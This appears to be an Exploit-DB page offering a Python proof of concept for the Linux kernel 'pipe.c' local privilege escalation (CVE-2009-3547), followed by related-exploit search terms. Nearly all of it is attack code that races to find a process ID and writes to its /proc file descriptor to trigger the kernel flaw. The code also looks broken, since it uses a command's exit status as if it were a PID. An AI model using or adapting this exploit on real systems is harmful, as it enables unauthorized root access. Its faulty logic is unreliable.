# This is a PoC based off the PoC release by Earl Chew # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability # PoC by Matthew Bergin # Bugtraq ID: 36901 # # E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploit-database/pull/82/files import os import time import random #infinite loop i = 0 x = 0 while (i == 0): os.system("sleep 1") while (x == 0): time.sleep(random.random()) #random int 0.0-1.0 pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }")) if (pid == "0"): #need an active pid, race condition applies print "[+] Didnt grab PID, got: " + pid + " -- Retrying..." break else: print "[+] PID: " + pid loc = "echo n > /proc/" + pid + "/fd/1" os.system(loc) # triggers the fault, runs via sh
Related Exploits
Trying to match CVEs (1): CVE-2009-3547Trying to match OSVDBs (1): 59654
Other Possible E-DB Search Terms: Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5, Linux Kernel 2.4.1 < 2.4.37, Linux Kernel